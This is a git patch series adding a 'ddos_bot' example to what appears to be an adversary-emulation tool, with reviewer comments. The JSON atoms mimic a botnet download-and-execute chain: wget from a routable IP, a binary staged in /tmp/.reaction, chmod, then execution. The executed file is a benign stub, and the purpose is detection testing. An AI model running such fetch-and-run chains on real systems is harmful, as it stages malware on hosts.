From c27128142c6e6762d4cb92755545d41ace5cae53 Mon Sep 17 00:00:00 2001
From: rctgardner <59621072+rctgardner@users.noreply.github.com>
Date: Mon, 24 May 2021 16:33:29 -0600
Subject: [PATCH 1/2] created ddos_bot example reaction
---
 examples/ddos_bot/atoms.json | 20 +++++++++++++++++++
 .../ddos_bot/generic_ddos_bot_reaction.json | 9 +++++++++
 2 files changed, 29 insertions(+)
 create mode 100644 examples/ddos_bot/atoms.json
 create mode 100644 examples/ddos_bot/generic_ddos_bot_reaction.json
diff --git a/examples/ddos_bot/atoms.json b/examples/ddos_bot/atoms.json
new file mode 100644
index 0000000..f2121c5
--- /dev/null
+++ b/examples/ddos_bot/atoms.json
@@ -0,0 +1,20 @@
+[
+ {
+ "name": "DELETE-BOT",
+ "remove": [ "./x86_64" ]
+ },
+ {
+ "name": "DOWNLOAD-BOT",
+ "fork-and-rename": [ "wget", "http://4.4.2.2/Simps/x86_64" ],
+ "file-create": { "path": "/tmp/x86_64", "data": "#!/bin/sh\nchain-reactor DDoS Botnet test\n", "backup-and-revert": false },
+ "chmod": { "path": "mips", "mode": "755" }
+ },
+ {
+ "name": "EXECUTE-BOT",
+ "fork-and-rename": [ "./x86_64", "x86_64" ]
+ },
+ {
+ "name": "STAGE-DIRECTORY",
+ "execve": [ "cd", "/tmp/" ]
+ }
+]
diff --git a/examples/ddos_bot/generic_ddos_bot_reaction.json b/examples/ddos_bot/generic_ddos_bot_reaction.json
new file mode 100644
index 0000000..c1217a6
--- /dev/null
+++ b/examples/ddos_bot/generic_ddos_bot_reaction.json
@@ -0,0 +1,9 @@
+{
+ "name": "generic_ddos_bot",
+ "atoms": [
+ "STAGE-DIRECTORY",
+ "DELETE-BOT",
+ "DOWNLOAD-BOT",
+ "EXECUTE-BOT"
+ ]
+}
From acd2af74257e8bdee4725caab666aba46afd8c79 Mon Sep 17 00:00:00 2001
From: rctgardner <59621072+rctgardner@users.noreply.github.com>
Date: Wed, 1 Sep 2021 15:41:10 -0600
Subject: [PATCH 2/2] reorder atoms and fix executable creation
---
 examples/ddos_bot/atoms.json | 14 ++++++++------
 examples/ddos_bot/generic_ddos_bot_reaction.json | 4 ++--
 2 files changed, 10 insertions(+), 8 deletions(-)
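Review bot: In [PATCH 1/2] `examples/ddos_bot/atoms.json`, the DOWNLOAD-BOT argv `http://4.4.2.2/Simps/x86_64` uses a publicly routable address rather than a reserved documentation range, and nothing in the example says whether the request is ever actually sent. If the quark only reproduces the command line this is harmless, but anyone who later switches the atom to a real `execve` of wget would send traffic from the test host to a third party. JSON cannot carry a comment, so a short README beside the atoms should state that the URL is a placeholder and list the telemetry the reaction is expected to produce; an RFC 5737 address (constructed example: `http://192.0.2.1/Simps/x86_64`) would make the placeholder status obvious. The same URL is carried unchanged into the follow-up commit.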
diff --git a/examples/ddos_bot/atoms.json b/examples/ddos_bot/atoms.json
index f2121c5..92c00ae 100644
--- a/examples/ddos_bot/atoms.json
+++ b/examples/ddos_bot/atoms.json
@@ -1,20 +1,22 @@
 [
 {
 "name": "DELETE-BOT",
- "remove": [ "./x86_64" ]
+ "remove": [ "/tmp/.reaction/x86_64", "/tmp/.reaction" ]
 },
 {
 "name": "DOWNLOAD-BOT",
- "fork-and-rename": [ "wget", "http://4.4.2.2/Simps/x86_64" ],
- "file-create": { "path": "/tmp/x86_64", "data": "#!/bin/sh\nchain-reactor DDoS Botnet test\n", "backup-and-revert": false },
- "chmod": { "path": "mips", "mode": "755" }
+ "fork-and-rename": [ "wget", "http://4.4.2.2/Simps/x86_64", "-o", "/tmp/.reaction/x86_64" ],
+ "file-create": { "path": "x86_64", "data": "#!/bin/sh\necho 'chain-reactor DDoS Botnet test'\n", "backup-and-revert": false },
+ "chmod": { "path": "x86_64", "mode": "755" },
+ "copy": [ "x86_64", "/tmp/.reaction/x86_64" ],
+ "remove": [ "x86_64" ]
 },
 {
 "name": "EXECUTE-BOT",
- "fork-and-rename": [ "./x86_64", "x86_64" ]
+ "execve": [ "/tmp/.reaction/x86_64", "exit" ]
 },
 {
 "name": "STAGE-DIRECTORY",
- "execve": [ "cd", "/tmp/" ]
+ "execve": [ "mkdir", "-p", "/tmp/.reaction" ]
 }
 ]
diff --git a/examples/ddos_bot/generic_ddos_bot_reaction.json b/examples/ddos_bot/generic_ddos_bot_reaction.json
index c1217a6..aa02bf9 100644
--- a/examples/ddos_bot/generic_ddos_bot_reaction.json
+++ b/examples/ddos_bot/generic_ddos_bot_reaction.json
@@ -2,8 +2,8 @@
 "name": "generic_ddos_bot",
 "atoms": [
 "STAGE-DIRECTORY",
- "DELETE-BOT",
 "DOWNLOAD-BOT",
- "EXECUTE-BOT"
+ "EXECUTE-BOT",
+ "DELETE-BOT"
 ]
 }
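Review bot: In DOWNLOAD-BOT the added wget arguments use `-o`, which GNU wget treats as the log-file option; the option that names the saved document is `-O`, so the recorded command line does not describe a download to `/tmp/.reaction/x86_64` and detections keyed on that form may not match. Suggested line: `"fork-and-rename": [ "wget", "http://4.4.2.2/Simps/x86_64", "-O", "/tmp/.reaction/x86_64" ],`. The path handed to wget is also the path that `copy` fills and EXECUTE-BOT runs, under a fixed name in world-writable `/tmp`, so what executes is the benign stub only if the stub is the last writer (presumably true when the quarks run in listed order and wget is never really invoked, but that should be confirmed). Giving the wget argument a different file name from the executed stub, and running the reaction only on a disposable host, removes that dependency.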